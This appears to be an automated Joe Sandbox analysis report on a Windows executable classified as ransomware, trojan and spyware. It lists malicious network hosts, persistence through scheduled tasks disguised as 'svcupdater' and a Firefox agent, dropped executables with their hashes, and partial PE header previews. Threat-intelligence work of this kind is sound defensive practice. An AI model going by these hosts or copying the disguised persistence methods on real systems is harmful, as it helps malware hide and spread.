                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2006/02/addressingidentityngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/soap/envelope/ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://search.yahoo.com?fr=crmas_sfpfngentask.exe, 00000012.00000002.460489461.0000000003671000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.0000000004681000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs
                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      144.76.136.153
                                                                                                                                      transfer.shGermany
                                                                                                                                      24940HETZNER-ASDEfalse
                                                                                                                                      188.114.97.3
                                                                                                                                      potunulit.orgEuropean Union
                                                                                                                                      13335CLOUDFLARENETUStrue
                                                                                                                                      109.206.243.168
                                                                                                                                      unknownGermany
                                                                                                                                      209929AWMLTNLtrue
                                                                                                                                      162.0.217.254
                                                                                                                                      api.2ip.uaCanada
                                                                                                                                      35893ACPCAfalse
                                                                                                                                      89.208.103.88
                                                                                                                                      unknownRussian Federation
                                                                                                                                      42569PSKSET-ASRUtrue
                                                                                                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                      Analysis ID:791295
                                                                                                                                      Start date and time:2023-01-25 09:41:05 +01:00
                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 14m 25s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:light
                                                                                                                                      Sample file name:aw9Ynwqd1x.exe
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                      Number of analysed new started processes analysed:43
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:1
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • HDC enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.rans.troj.spyw.evad.winEXE@30/14@4/5
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                      HDC Information:
                                                                                                                                      • Successful, ratio: 62.2% (good quality ratio 54.6%)
                                                                                                                                      • Quality average: 64.6%
                                                                                                                                      • Quality standard deviation: 34.4%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 99%
                                                                                                                                      • Number of executed functions: 0
                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                      • Override analysis time to 240s for rundll32
                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, login.live.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                      TimeTypeDescription
                                                                                                                                      09:42:17API Interceptor1524x Sleep call for process: explorer.exe modified
                                                                                                                                      09:42:40Task SchedulerRun new task: Firefox Default Browser Agent 3F21743AEE756304 path: C:\Users\user\AppData\Roaming\dbjigst
                                                                                                                                      09:43:30API Interceptor33x Sleep call for process: ngentask.exe modified
                                                                                                                                      09:44:35Task SchedulerRun new task: svcupdater path: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                                                      09:45:37API Interceptor44x Sleep call for process: powershell.exe modified
                                                                                                                                      No context
                                                                                                                                      No context
                                                                                                                                      No context
                                                                                                                                      No context
                                                                                                                                      No context
                                                                                                                                      Process:C:\Windows\System32\dllhost.exe
                                                                                                                                      File Type:CSV text
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):3941
                                                                                                                                      Entropy (8bit):5.3577599206293485
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:iqEYqGgAo3+aJtIz6cxBAmRvBIQYrjVxmc5qCqKP5t2qBtzG1/qIgE:iqEYqGDeIz6rjjqCqKRt2qBtzG1/qNE
                                                                                                                                      MD5:42733E87CE0EFB04DBD1645F05E8E116
                                                                                                                                      SHA1:5CDAE1A1CD7318D6426E438E2EAFEDA651E3B3AA
                                                                                                                                      SHA-256:D82328B2E33426C19C8B536DC5A21450006D366FC8343B5B2BBD88E6BD84DE7D
                                                                                                                                      SHA-512:A387B92226C384907A38A766E56CD51A134878915F048C986AE1313D071A1E5F2A84D708C65E1C3CF43360D8EA64CBD11850EA3DEFBE366EEBCE8A5EFF745158
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\8b2774850bdc17a926dc650317d86b33\System.Management.Automation.ni.dll",0..3,"Microsoft.PowerShell.Commands.Diagnostics, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\a3e764ed5105d4b1ca29e76f9dbbe5d7\Microsoft.PowerShell.Commands.Diagnostics.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2843
                                                                                                                                      Entropy (8bit):5.3371553026862095
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKx1qHje:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxU
                                                                                                                                      MD5:75BC6DB42CE4C37482926043D9B80BC9
                                                                                                                                      SHA1:700BDF1D18804FBE60EB0318B290C37CDC60EA41
                                                                                                                                      SHA-256:15F15BDEB42AD40DBCB6BB9064C33B51CB43EDB99820EDE647350BE604AAF58A
                                                                                                                                      SHA-512:26E15E546BBD6518265BAC343F952E75B30C7927143D293780F456A5B44C1E1B6B7D074DF00BC6328D23E52FE9E3F8850A879B129C35F47B0ED864E9C640BA4F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):9432
                                                                                                                                      Entropy (8bit):4.918232018284106
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Nxoe5FpOMxoe5Pib4GVsm5emdygkjDt4iWN3yBGHh9smidcU6CGdcU6CS9smDpOh:bfib4Glkjh4iUxs14fib41
                                                                                                                                      MD5:F6775EDC5EE3B8EEDBF8310BD48C709D
                                                                                                                                      SHA1:51DBC51183BFBFE57F24E9AD63840E60D2E64842
                                                                                                                                      SHA-256:B5D6E4B1EF4F3E734E47F87E8226814AE7D574F4E458CCE4E21D637588F45B28
                                                                                                                                      SHA-512:EDCED69415369C7EBA17D72EC1691FE44F5C5DCF7565EAE1A22112E631FFBBCE72B830BBF0D91E70484BC7F0E4D59870777B07E86126438E78E15A7337D97BD6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):1642648
                                                                                                                                      Entropy (8bit):7.847643854402106
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:murDawItlpDZLPU/kHWGPaYE3Ku7ZKZ6nxvax85fCSuw:muPawItlpDZDU/kZPaYm/JvaxQCK
                                                                                                                                      MD5:EA25CE2F3580AF1DD771BAC5B0D2BF83
                                                                                                                                      SHA1:8A425695AE3154F222BA4A7A8AF03287D20F8BC4
                                                                                                                                      SHA-256:768E12A9AF62F5F83F6D6FF64C6C10E37834FC202E0E4D609C80CE7FACC8C534
                                                                                                                                      SHA-512:70776BD050666D7ABCDB0668832A652FC4A67E45243DFD229520DA3712B85B506FFE9C3ED3C3C1E89F388C2D56B6E3FC8CDC31B35485FF1BA456F8A47277F0C4
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 43%
                                                                                                                                      • Antivirus: Virustotal, Detection: 39%, Browse
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........G.b...b...b...0>..b...0/..b...09..b.......b...b...b...00..b...0...b...b-..b...0+..b..Rich.b..........................PE..L....~.c......................#.....k.............@...........................9.....2[....@.....................................P.....6.0.....................9.........................................@...............`............................text...6........................... ..`.rdata...0.......2..................@..@.data...<. .........................@....rsrc...0.....6.....................@..@.reloc...I....9..J..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):718848
                                                                                                                                      Entropy (8bit):7.8663391957867645
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:XQc1wGGrXn8rDAG7ps+O6TuFlgflEKK9LcFXTASviKWBNbaPSFS:XTwGGrsASprtEKK9wF0SrWBQKFS
                                                                                                                                      MD5:0A006808F7AA017CAF2DF9CE9E2B55A2
                                                                                                                                      SHA1:63F5B0E9FE5E3DAEBDBFC8AA168AB163E436AC32
                                                                                                                                      SHA-256:F55976607594D241004245F084ADD64F399F7D4683C603F56EF92C0CBCD41E05
                                                                                                                                      SHA-512:8AD4C111BF0904EB739A462E274C7A2FD9EC1AFB2DB7D77F176B26438520C4859B2CCB46A4C76F206E20B4584E434E1D78B26DCD042F08B3D573BB99036E8C73
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..Y.pl..pl..pl.."...pl.."..rpl.(....pl..pm..pl.."..,pl.."...pl.."...pl.Rich.pl.................PE..L......a.....................Z......6x............@.........................................................................,...d....p..P,..........................P................................Z..@............................................text.............................. ..`.data............4..................@....rsrc...P,...p......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):417792
                                                                                                                                      Entropy (8bit):7.008431460440525
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:GILot0e73kNAn1SNCe64axZb30GvtQK/fu1d04DI12mTb:GIct0eLkPNL64Y91tQKXu1PDI12
                                                                                                                                      MD5:261B1DB94CCF4266128E2EB71A80FDA4
                                                                                                                                      SHA1:9D4CD03297F31EABE957F261DC7C3C6C268BD39F
                                                                                                                                      SHA-256:B0072463E78182E8D9721F91F889A62D9CE59A348FDDC5196B6201A5FA68B259
                                                                                                                                      SHA-512:2DD25970561CF9E3D946ACD891B601E6AA7E6563DDE6C10ED5AC1A6486BBC1851CF3908B5BDEE6C9B29633E51C90339209C50D97C0EA28B897BD6E7117B1AC7B
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M_.`.>.3.>.3.>.3.lQ3->.3.l@3.>.3.lV3o>.3...3.>.3.>.3~>.3.l_3.>.3.lA3.>.3.lD3.>.3Rich.>.3................PE..L......b.............................F............@.........................................................................T...d.... ..(............................................................-..@............................................text...8........................... ..`.data...............................@....huxuho.p...........................@..@.gini...............................@..@.vab................................@....rsrc...(.... ......................@..@.reloc...............F..............@..B................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\226F.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):343040
                                                                                                                                      Entropy (8bit):7.533406928573143
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:324+ZV6NuvwV+hq3kd2UaXYnKUFWBMljuhLaWdTPk8SarppXad:YuNuvwUhq3kd2USYKUQ6ljkLaWdTPk8q
                                                                                                                                      MD5:F56B1B3FE0C50C6ED0FAD54627DF7A9A
                                                                                                                                      SHA1:05742C9AD28475C7AFDD3D6A63DD9200FC0B9F72
                                                                                                                                      SHA-256:E8F71DA41BBC272EF84589A7575B13B8B5D6D5D01796B3AF033682657263C53B
                                                                                                                                      SHA-512:FDE2089BCDF19CDB9D27763E4D3294A0E42CD0A3132463636610D85C3903B885BE6142D3B42204E89B76B5595E8B132580C8A5C60CED96D042AD96BCFE29B1C9
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...r..c...........!.........|............................................................@.............................s.......<............................`......................................................d...$............................text.............................. ..`.rdata...[.......\..................@..@.data...x....0......................@....00cfg.......P.......&..............@..@.reloc.......`.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Windows\System32\dllhost.exe
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3162624
                                                                                                                                      Entropy (8bit):7.989170144844482
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:Bc60tZPCW+7npLN+LGgXP1idPDhwcsuuKQLlv02EmYakkriZ7czTnItexztCNxR4:BaV+tLN+qg/8rhUuunlm9kg4TniizEv
                                                                                                                                      MD5:EC5A11FC9A9CB3111AFA460FEC201D3D
                                                                                                                                      SHA1:5E2665BBDAD06FC5423FB9E6C819AE4CB9982DE1
                                                                                                                                      SHA-256:F553B5D26D797F332B036D42B43793622CED3EA336FD2EFDA337D39679E9B824
                                                                                                                                      SHA-512:6F8EC56125F20D1D444B4DD5438FB73FF6A268FB0D4B97C1D03960BECC3E4FED8BA95C85B4BD7B7B4A27E165E0CBD81B4D05D79FC0CF7B31A6BA404150132A94
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....R.c.........."...0..:0.............. .....@..... ........................0...........@..........................................................`0.............................................................................................. ..H............text...L90.. ...:0................. ..`.rsrc........`0......<0.............@..@........................................H........./.x...........HD...............................................0..........(:...(g...*.*....0.......... ..[....(4...&*..(....*..0.......... >.[....(4...&*..0.......... \.[....(4...t....*..0..,....... s.[.(....o.....(....o....(......(4...t....*.0.......... ..[....(4...t....*..0.......... ..[....(4...&*..0................%.... 2.[....(4........*...0.......... Y.[....(4...t....*..0................%.... ..[....(4...t....*...0............{.....{.....o.....+..*R.(.......s....}....
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1
                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1
                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\336E.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):752246784
                                                                                                                                      Entropy (8bit):7.999823889690503
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:
                                                                                                                                      MD5:A4C9D357EA9C7679D978EB985F61E6C5
                                                                                                                                      SHA1:F5CD28E15AE9AA3F95C7DC8DF9CD0E09B6E9B650
                                                                                                                                      SHA-256:4FA6D1456D893E3653BA35F77FDD94099DD20986DABB657BE14E7455BB70910A
                                                                                                                                      SHA-512:20E511E8D928748C1DBA8C605483A2D98F46E5F7C8FFD07A21613AF01D00AA20087038B65002C179DF69B202FC4A62764A3B2AC61C3F8988DD913B448E275EB0
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M_.`.>.3.>.3.>.3.lQ3->.3.l@3.>.3.lV3o>.3...3.>.3.>.3~>.3.l_3.>.3.lA3.>.3.lD3.>.3Rich.>.3................PE..L......b.............................F............@.........................................................................T...d.... ..(............................................................-..@............................................text...8........................... ..`.data...............................@....huxuho.p...........................@..@.gini...............................@..@.vab................................@....rsrc...(.... ......................@..@.reloc...............F..............@..B................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):199680
                                                                                                                                      Entropy (8bit):7.104315914125058
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:OBN4X3HL6thikLX8OKWnG5/9sSR3STCDrKQqSrwizN5UE3Z9ziBG7aZ:imG7LX9pno9sSxOCDlrwiz75p9oG7w
                                                                                                                                      MD5:B5C3C3D5EB5E6B5415AC4D87E3C46850
                                                                                                                                      SHA1:9AA4014DE1B622844DDFA4C7DDB17AE384289CD2
                                                                                                                                      SHA-256:B7948C22484BDDCE96A2713DA0A6BDA18CFD0487DB9239ED0FD1790552D5E6B2
                                                                                                                                      SHA-512:C573290AA51321D892BE106F42CE6728B20E6AF4EC4DF4F5020DB364DD7103F89C62CE67C19EB50767707FB0DD30B977CE1DA2E9EB53D6799CE08501A68C6B65
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4*.FUD.FUD.FUD.X..[UD.X..8UD.a.?.MUD.FUE..UD.X...bUD.X..GUD.X..GUD.RichFUD.........PE..L......a.....................hx......~............@...........................y................................................x.....y.x*..........................P................................Z..@............................................text............................... ..`.data.....w......D..................@....rsrc...x*....y..,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26
                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                      Process:C:\Windows\SysWOW64\fontview.exe
                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):58880
                                                                                                                                      Entropy (8bit):5.816689146123608
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:G8UC0v3QaNfPhY1M/staXbOgt/pqFjkWKihkWuxvDI5syov9L7YYy/BbEl:Ts3N39/B/pqFjdFhkzqk9LMDM
                                                                                                                                      MD5:713062DABA2534394662294035FD7E92
                                                                                                                                      SHA1:40270752DB5576F1D5E6C935F224754C7B6C3450
                                                                                                                                      SHA-256:E6A5CA65ACFD261D56F622F891BF04E6D41862AB505466374DAEEE8852A01B71
                                                                                                                                      SHA-512:E07D9C38D43334CB8E35B32C12EEF9FF1DDB7FFE0004AE0D56FE3FB24FBEC6B179B631F61AFC54B1D31AD02C619442C783A9D881CCE86BE833B39C59F236B2FD
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u...u...u.Z....u...t..u.......u......u.......u.......u.......u.Rich..u.................PE..d....-.c.........." .........t...............................................0..........................................................L.......(............................ ..........................................................x............................text............................... ..`.rdata..<........0..................@..@.data...X5..........................@....pdata..............................@..@.reloc..j.... ......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.104315914125058
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:aw9Ynwqd1x.exe
                                                                                                                                      File size:199680
                                                                                                                                      MD5:b5c3c3d5eb5e6b5415ac4d87e3c46850
                                                                                                                                      SHA1:9aa4014de1b622844ddfa4c7ddb17ae384289cd2
                                                                                                                                      SHA256:b7948c22484bddce96a2713da0a6bda18cfd0487db9239ed0fd1790552d5e6b2
                                                                                                                                      SHA512:c573290aa51321d892be106f42ce6728b20e6af4ec4df4f5020db364dd7103f89c62ce67c19eb50767707fb0dd30b977ce1da2e9eb53d6799ce08501a68c6b65
                                                                                                                                      SSDEEP:3072:OBN4X3HL6thikLX8OKWnG5/9sSR3STCDrKQqSrwizN5UE3Z9ziBG7aZ:imG7LX9pno9sSxOCDlrwiz75p9oG7w
                                                                                                                                      TLSH:0B14D03276B3C0B3C55A04711824DBD53E7BB53046B5884B7BA80ABD5E707E1A76B38E
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4*.FUD.FUD.FUD.X...[UD.X...8UD.a.?.MUD.FUE..UD.X...bUD.X...GUD.X...GUD.RichFUD.........PE..L......a.....................hx....
                                                                                                                                      Icon Hash:d0b0b892e8e4c0c4
                                                                                                                                      Entrypoint:0x407ed4
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
